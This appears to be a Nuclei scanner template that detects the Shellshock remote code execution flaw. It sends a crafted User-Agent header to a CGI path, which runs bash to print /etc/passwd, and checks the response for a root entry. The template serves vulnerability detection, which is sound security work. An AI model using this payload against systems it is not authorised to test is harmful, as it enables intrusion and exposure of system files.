nuclei-templates/vulnerabilities/other/rce-shellshock-user-agent.yaml

19 lines
399 B
YAML

id: rce-user-agent-shell-shock
info:
name: Remote Code Execution Via (User-Agent)
author: 0xelkomy
severity: high
tags: shellshock,rce
requests:
- method: GET
headers:
User-Agent: "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'"
path:
- "{{BaseURL}}/cgi-bin/status"
matchers:
- type: regex
regex:
- "root:.*:0:0"
part: body